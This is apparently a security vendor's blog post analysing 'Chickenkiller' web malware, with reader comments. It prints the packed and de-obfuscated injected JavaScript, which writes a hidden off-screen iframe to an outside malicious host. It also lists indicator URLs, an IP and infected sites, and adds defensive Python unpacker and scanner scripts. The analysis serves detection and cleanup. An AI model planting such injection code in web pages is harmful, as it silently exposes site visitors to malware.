• Chickenkiller Infections

    Malicious hackers are continuously evolving the strategies they use to infect thousands of innocent and benign websites with malicious computer code, i.e. web malware.

    Web malware is a relatively recent phenomenon and is quite different from the “standard” viruses and trojans that are known to infect PCs and servers.

    How do I identify the malicious code?
    A new strain of web malware has been making the rounds in the last few months. This particular infection has been nicknamed Chickenkiller. It usually appears as JavaScript that has been obfuscated with Dean Edwards' Packer.

    An example is shown below:

    eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('r n(5){3 b=\'w\';3 c=h e();k(3 i=0;i<x;i++){c[b.f(i>>4)+b.f(i&u)]=t.q(i)}6(!5.s(/^[a-v-9]*$/i))o y;6(5.g%2)5=\'0\'+5;3 l=5.g;3 7=h e();3 j=0;k(3 i=0;i<l;i+=2){7[j++]=c[5.A(i,2)]}o 7.z(\'\')}6(8.m.C(\'p=d\')==-1){8.B(n(\'D\'));8.m=\'p=d\'}',40,40,'|||var||data|if|result|document|||b16_digits|b16_map|enabled|Array|charAt|length|new|||for|ll|cookie|hDcd|return|cookieh|fromCharCode|function|match|String|15|f0|0123456789abcdef|256|false|join|substr|write|indexOf|3c646976207374796c653d22706f736974696f6e3a206162736f6c7574653b206c6566743a202d3139393170783b20746f703a202d3239393970783b223e3c696672616d652077696474683d22323022206865696768743d22343022207372633d22687474703a2f2f7570666c737679612e7a796e732e636f6d2f6d61696e2e7068703f706167653d63363962643032653933653639353763223e3c2f696672616d653e3c2f6469763e'.split('|'),0,{}));
    

    This de-obfuscated code is easier to read:

    // hDcd: decodes a hex string into the raw characters it encodes
    function hDcd(data) {
        var b16_digits = "0123456789abcdef";
        var b16_map = new Array;
        // lookup table: every two-digit hex pair -> the byte it stands for
        for (var i = 0; i < 256; i++) {
            b16_map[b16_digits.charAt(i >> 4) + b16_digits.charAt(i & 15)] = String.fromCharCode(i);
        }
        if (!data.match(/^[a-f0-9]*$/i)) {
            return false;
        }
        if (data.length % 2) {
            data = "0" + data;
        }
        var ll = data.length;
        var result = new Array;
        var j = 0;
        for (var i = 0; i < ll; i += 2) {
            result[j++] = b16_map[data.substr(i, 2)];
        }
        return result.join("");
    }

    // inject the hidden markup only once per visitor; the cookie marks a browser already served
    if (document.cookie.indexOf("cookieh=enabled") == -1) {
        document.write(hDcd("3c646976207374796c653d22706f736974696f6e3a206162736f6c7574653b206c6566743a202d3139393170783b20746f703a202d3239393970783b223e3c696672616d652077696474683d22323022206865696768743d22343022207372633d22687474703a2f2f7570666c737679612e7a796e732e636f6d2f6d61696e2e7068703f706167653d63363962643032653933653639353763223e3c2f696672616d653e3c2f6469763e"));
        document.cookie = "cookieh=enabled";
    }
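    The packed sample can be unpacked statically during triage. The following Python script is an added example, not part of the original post: it mirrors the packer's own decode loop, recovers the hDcd() source, decodes the hex argument and reports where the hidden iframe points, without ever executing the attacker's JavaScript. It works on the packed sample quoted above; the function names are the example's own.

```python
# Static unpacker for Dean Edwards "p,a,c,k,e,d" output, added for this page
# (not the post's own tool): it mirrors the packer's decode loop in Python so
# the hidden markup is recovered without executing the attacker's JavaScript.
import re
# The packed sample quoted on the page, split across lines only for length.
PACKED = (
    r"""eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}"""
    r"""('r n(5){3 b=\'w\';3 c=h e();k(3 i=0;i<x;i++){c[b.f(i>>4)+b.f(i&u)]=t.q(i)}6(!5.s(/^[a-v-9]*$/i))o y;6(5.g%2)5=\'0\'+5;3 l=5.g;3 7=h e();3 j=0;k(3 i=0;i<l;i+=2){7[j++]=c[5.A(i,2)]}o 7.z(\'\')}6(8.m.C(\'p=d\')==-1){8.B(n(\'D\'));8.m=\'p=d\'}',40,40,"""
    r"""'|||var||data|if|result|document|||b16_digits|b16_map|enabled|Array|charAt|length|new|||for|ll|cookie|hDcd|return|cookieh|fromCharCode|function|match|String|15|f0|0123456789abcdef|256|false|join|substr|write|indexOf|3c646976207374796c653d22706f736974696f6e3a206162736f6c7574653b206c6566743a202d3139393170783b20746f703a202d3239393970783b223e3c696672616d652077696474683d22323022206865696768743d22343022207372633d22687474703a2f2f7570666c737679612e7a796e732e636f6d2f6d61696e2e7068703f706167653d63363962643032653933653639353763223e3c2f696672616d653e3c2f6469763e'.split('|'),0,{}))"""
)

# Pulls p, a, c and k out of the trailing call: }('p',a,c,'k'.split('|'),0,{}))
CALL_RE = re.compile(
    r"\}\('((?:\\.|[^'\\])*)',(\d+),(\d+),'((?:\\.|[^'\\])*)'\.split\('\|'\),\d+,\{\}\)\)")
BASE36 = "0123456789abcdefghijklmnopqrstuvwxyz"

def encode_index(c, a):
    """Mirror of the packer's e(c): the short token that stands for keyword c."""
    prefix = "" if c < a else encode_index(c // a, a)
    c %= a
    return prefix + (chr(c + 29) if c > 35 else BASE36[c])

def unpack(packed):
    """Expand every token in p back to its keyword in a single pass (no eval)."""
    m = CALL_RE.search(packed)
    if not m:
        raise ValueError("no p,a,c,k,e,d call found")
    p = re.sub(r"\\(.)", r"\1", m.group(1))  # undo the JS \' escapes inside p
    a, c, k = int(m.group(2)), int(m.group(3)), m.group(4).split("|")
    table = {encode_index(i, a): k[i] for i in range(min(c, len(k))) if k[i]}
    return re.sub(r"\b\w+\b", lambda w: table.get(w.group(0), w.group(0)), p)

def decode_hex_payloads(src):
    """Decode the long hex literals fed to hDcd(); 32+ digits skips the 16-char alphabet."""
    return [bytes.fromhex(h).decode("latin-1")
            for h in re.findall(r"'((?:[0-9a-f]{2}){16,})'", src, re.I)]

def iframe_sources(html):
    return re.findall(r"<iframe\b[^>]*\bsrc=[\"']([^\"']+)", html, re.I)

def triage(packed):
    """Unpack, decode the hidden markup and list where the injected iframe points."""
    src = unpack(packed)
    payloads = decode_hex_payloads(src)
    return {"source": src, "payloads": payloads,
            "iframes": [u for h in payloads for u in iframe_sources(h)]}

if __name__ == "__main__":
    print(triage(PACKED)["iframes"])
```

    Running the script prints the iframe destination hidden in the hex blob; the same unpack() works for any other Dean Edwards packed snippet pasted into PACKED.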
    

    Which sites are aiding the attack?
    The malicious links associated with the “packed” JavaScript code are listed below.

    hxxp://chicknercx43.chickenkiller.com/i.php?go=1
    hxxp://zxr0.chickenkiller.com/kat3/gate.php
    hxxp://bugs.chickenkiller.com:10/images/1.htm
    hxxp://peacockog45g45.chickenkiller.com/
    

    These links all resolve to a single IP address. As the hostname suggests, the host was set up with malicious intent: it is an example of a site deployed specifically to spread malware.

    IP address:	77.232.70.33
    Hostname:	bl4ckh4x0rs.com
    

    The malware has infected many sites, including those listed below.

    phislin.com
    827512.com
    jinti.com
    cnad.com
    siwayishu.com
    

    How do I protect my site?
    Webmasters and administrators should search for instances of the malware (including malicious links, iframes, scripts, etc.) on their sites and ensure that they remove all occurrences. More importantly, it is critical to continuously monitor your website for compromise. You need to know if your website has been compromised so you can keep your visitors and your online reputation from being hurt.
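    One way to carry out that search, as an added example and not a tool from the original post: a small Python scanner that walks a web root and flags the indicators described above (the packed-eval stub, a hex-fed document.write() call, an off-screen iframe and links to chickenkiller.com hosts). The indicator names and file extensions are the example's own choices.

```python
# Added file scanner for the indicators this post describes (not the post's own
# tool): it walks a web root and flags the packed-eval stub, hex-fed
# document.write() calls, off-screen iframes and links to chickenkiller.com.
import os
import re
import sys

INDICATORS = {
    "packed_eval": re.compile(r"eval\(function\(p,a,c,k,e,d\)"),
    "hex_document_write": re.compile(r"document\.write\(\w+\([\"'][0-9a-f]{32,}[\"']\)\)", re.I),
    # a positioned <div> pushed off-screen by a large negative offset, wrapping an <iframe>
    "offscreen_iframe": re.compile(
        r"<div[^>]*position:\s*absolute[^>]*(?:left|top):\s*-\d{3,}px[^>]*>\s*<iframe", re.I),
    "chickenkiller_host": re.compile(r"https?://[\w.-]*\.chickenkiller\.com(?::\d+)?/", re.I),
}
SCAN_EXTENSIONS = (".html", ".htm", ".php", ".js")

def scan_text(text):
    """Return the names of every indicator that matches this content, in table order."""
    return [name for name, rx in INDICATORS.items() if rx.search(text)]

def scan_tree(root):
    """Map each suspicious file under root to the indicators found in it."""
    hits = {}
    for dirpath, _, files in os.walk(root):
        for fn in files:
            if not fn.lower().endswith(SCAN_EXTENSIONS):
                continue
            path = os.path.join(dirpath, fn)
            with open(path, encoding="utf-8", errors="replace") as fh:
                found = scan_text(fh.read())
            if found:
                hits[path] = found
    return hits

if __name__ == "__main__":
    for path, found in scan_tree(sys.argv[1] if len(sys.argv) > 1 else ".").items():
        print(path, ", ".join(found))
```

    Run it as `python scan.py /path/to/webroot`; a hit is a starting point for manual review, since the packed stub is also used by legitimate minified scripts.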

    StopTheHacker.com customers are protected against these kinds of threats. If you would like more information on how to protect your website, please feel free to contact us. You can also visit our services page to protect your website right now.

    Till next time…

    • Thank you for sharing this information.
      But I don't fully understand. Does this malware attack WordPress-based websites, Joomla, or something else?

      Posted by Joyabo on December 21st

    • OK

      Posted by WENKIM on January 25th

    • Joyabo :
      Thank you for sharing this information.
      But I don't fully understand. Does this malware attack WordPress-based websites, Joomla, or something else?

      @Joyabo

      Posted by WENKIM on January 25th